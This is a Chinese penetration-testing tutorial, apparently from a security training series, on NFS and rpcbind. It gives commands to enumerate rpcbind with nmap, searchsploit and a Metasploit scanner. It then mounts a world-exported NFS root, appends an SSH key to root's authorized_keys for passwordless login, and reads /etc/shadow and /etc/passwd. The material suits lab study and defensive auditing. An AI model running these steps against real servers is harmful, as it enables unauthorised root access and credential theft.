4.8、漏洞利用-NSF配置漏洞与Rpcbind信息泄露

这篇具有很好参考价值的文章主要介绍了4.8、漏洞利用-NSF配置漏洞与Rpcbind信息泄露。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

1、相关服务介绍

1.1 NFS

1.2 RPC服务

2、探测目标rpcbind

2.1 探测版本信息

2.2 nmap脚本探测

2.3 使用metasploit模块验证


1、相关服务介绍

1.1 NFS

NFS(network file system):网络文件系统。Linux下三大文件系统之一,采用C/S架构。允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS应用中,本地NFS客户端可以透明的读写位于远端NFS服务器上的文件。

NFS服务端机器:通过NFS协议将文件共享到网络上

NFS客户端机器:通过网络挂载NFS共享目录到本地

补充:NFS服务器主要进程

1 rpc.nfsd 进程
NFS 服务的主进程,主要管理客户端是否能够接入 NFS 服务器以及数据的传输。

该进程固定监听 TCP/UDP 2049 端口。

2 rpc.mountd 进程
管理和维护 NFS 文件系统,根据所设定的权限决定是否允许客户端挂载指定的共享目录。

该进程监听的端口默认是不固定的。

3 rpc.lockd 进程
提供文件锁功能,防止多个客户端同时写入一个文件。

该进程监听的端口默认是不固定的。

4 rpc.statd 进程
负责检查数据的状态及一致性,需要与 rpc.lockd 配合使用。

该进程监听的端口默认是不固定的。

5 rpcbind 进程
RPC 的端口映射器进程,监听 UDP 111 端口。

更多参考:

NFS详解(概念+实验演示)_Eichi_的博客-CSDN博客_nfs

1.2 RPC服务

RPC(Remote Procedure Call):远程过程调用协议。

NFS 只提供了基本的文件处理功能,而不提供任何 TCP/IP 数据传输功能。它需要借助 RPC 协议才能实现 TCP/IP 数据传输功能。

RPC 最主要的功能就是在指定每个 NFS 功能所对应的端口序号(port number ),并且回报给客户端,让客户端可以连结到正确的物理端口(port)上去。

本文实验即通过此探测此服务,获取NFS相关服务信息。

 补充:shodan搜索发现,全球开启111端口的服务器约210万

rpcbind漏洞,网络安全训练营,安全

2、探测目标rpcbind

2.1 探测版本信息

nmap -sV -p 111 192.168.x.xx

//探测rpcbind版本信息

rpcbind漏洞,网络安全训练营,安全

searchsploit rpcbind

//搜索相关漏洞

rpcbind漏洞,网络安全训练营,安全

2.2 nmap脚本探测

nmap -p 111 --script=rpcinfo 192.168.x.xx
//探测目标的rpcinfo信息

rpcbind漏洞,网络安全训练营,安全

2.3 使用metasploit模块验证

use auxiliary/scanner/misc/sunrpc_portmapper

//SunRPC Portmap程序枚举器
//此模块调用目标端口映射服务并枚举所有程序条目及其运行端口号。

rpcbind漏洞,网络安全训练营,安全rpcbind漏洞,网络安全训练营,安全

show info

//查看模块信息

rpcbind漏洞,网络安全训练营,安全

 3、Linux NFS共享目录配置漏洞

原理: NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys 可被修改,实现远程ssh无密码登录,或可导致NFS服务器文件被导出。

nmap --script=nfs-* IP
//星号加载所有有关于nfs探测的脚本,来探测对应目标的IP地址

除了可以使用nmap判断nfs是否可以导出,我们还可以使用showmount命令确定“/”共享(文件系统的根)是否可以导出到本地。可能需要安装nfs-common包才能使用"showmount"命令

apt-get install nfs-common
//安装nfs-common包
showmount -e IP
//showmount(show mounted disk),其功能是用于显示NFS服务器的共享信息。
//-d 仅显示已被NFS客户端加载的目录
//-e 显示NFS服务器上所有的共享目录

rpcbind漏洞,网络安全训练营,安全

/*表示根目录下的内容,都可以导出 

(1)远程SSH无密登录

ssh-keygen 
//生成RSA公钥

rpcbind漏洞,网络安全训练营,安全

cd /tmp
mkdir troot(名字随意)

mount –t nfs IP:/ /tmp/troot
//把192.168.92.9的根目录挂载到/tmp/troot/下

cat /root/.ssh/id_rsa.pub>>/tmp/troot/root/.ssh/authorized_keys
//把生成的公钥追加到靶机的authorized_keys

rpcbind漏洞,网络安全训练营,安全

ssh root@IP

//实现无密码登录

(2)导出NFS服务器文件文章来源地址https://www.toymoban.com/news/detail-787354.html

cd ~
mkdir nfs_root
//确定要导出新建的内容

mount -t nfs IP地址:/ ~/nfs_root -o nolock
//-o nolock表示不加任何处理,直接输出

cat ~/nfs_root/etc/shadow
//查看shadow文件
cat ~/nfs-root/etc/passwd
//查看passwd文件

到了这里,关于4.8、漏洞利用-NSF配置漏洞与Rpcbind信息泄露的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • ICMP“EtherLeak”信息泄露漏洞(CVE-2017-2304) ICMP“EtherLeak”信息泄露漏洞(CVE-2021-3031)漏洞解决办法

    ICMP“EtherLeak”信息泄露漏洞(CVE-2017-2304) ICMP“EtherLeak”信息泄露漏洞(CVE-2021-3031) 漏洞解决办法            

    2024年02月12日
    浏览(48)
  • 漏洞攻击中怎么去做最全面覆盖的sql注入漏洞攻击?表信息是如何泄露的?预编译就一定安全?最受欢迎的十款SQL注入工具配置及使用

    漏洞攻击中怎么去做最全面覆盖的sql注入漏洞攻击?表信息是如何泄露的?预编译就一定安全?最受欢迎的十款SQL注入工具配置及使用。 SQL注入是因为后台SQL语句拼接了用户的输入,而且Web应用程序对用户输入数据的合法性没有判断和过滤,前端传入后端的参数是攻击者可控

    2024年01月24日
    浏览(45)
  • 三、敏感信息泄露漏洞

    一、漏洞简述 二、数据类型 三、信息分类 1、系统敏感信息泄露 2、个人敏感信息泄露 四、修复建议

    2024年02月16日
    浏览(72)
  • 【漏洞复现】大华智慧园区综合管理平台信息泄露漏洞

            大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。         大华智慧园区综合管理平台存在信息泄露漏洞,攻击

    2024年02月22日
    浏览(44)
  • CVE-2023-28432 MinIO 信息泄露漏洞--漏洞复现10

    微信公众号搜索:南风漏洞复现文库 南风网络安全公众号首发 MinIO是美国MinIO公司的一款开源的对象存储服务器, 是一款高性能、分布式的对象存储系统. 它是一款软件产品, 可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIO。MinIO中存在一处信息泄露漏洞,

    2024年02月01日
    浏览(61)
  • 【漏洞复现】大华DSS视频管理系统信息泄露漏洞

            大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统,除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外,更注重用户使用的便利性。         大华DSS视频管理系统存在信息泄露漏洞,攻击

    2024年02月21日
    浏览(39)
  • Goby 漏洞更新 |ThinkPHP Debug 模式日志信息泄露漏洞

    ThinkPHP 是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架。ThinkPHP Debug 模式存在日志信息泄露漏洞,在开启Debug的情况下会在Runtime目录下生成日志,攻击者通过构造特殊URL地址,读取日志敏感信息。 ThinkPHP Debug 模式存在日志信息泄露漏洞,在开启Debug的情况下会

    2024年02月04日
    浏览(43)
  • Web漏洞-敏感信息泄露-后台地址爆破

    通过爬虫去爬取网站目录,然后将爬取到目录进行展现,同时也可以匹配关键目录,如:admin,manger等。 实验环境:kali 实验工具:Dirb 默认情况下后台地址是不应被搜索引擎爬取到,因为后台涉及到关键信息的展示和配置,如果后台地址简单或者后台存在未授权问题,则会给

    2024年02月12日
    浏览(50)
  • 漏洞修复---SSL/TLS协议信息泄露漏洞(CVE-2016-2183)

    1.查看当前openssl版本       我线上版本是   OpenSSL 1.0.2k-fips 26 Jan 2017  官网下载最新版本 【当前我下载的版本为 openssl-1.1.1q】 2.将压缩包上传到linux服务器     tar -zxvf openssl-1.1.1q.tar.gz 3.编译安装 4. 移除老版本openssl 5. 查看版本 openssl version 报错    openssl: error while loadi

    2024年02月16日
    浏览(50)
  • 解决漏洞:SSL/TLS协议信息泄露漏洞(CVE-2016-2183)

    错误详情: 解决方案  win2012R2解决办法 参考链接:Browse code samples | Microsoft Learn 下载该ps1的文件。 下载该ps1的文件。 首先运行PowerShell后去文件夹中运行,或者直接输入 D:Solve-Sweet32.ps1 即可 参考链接  SSL/TLS协议信息泄露漏洞(CVE-2016-2183)解决办法(WindowsServer2012r2 3389端口 )

    2024年02月12日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包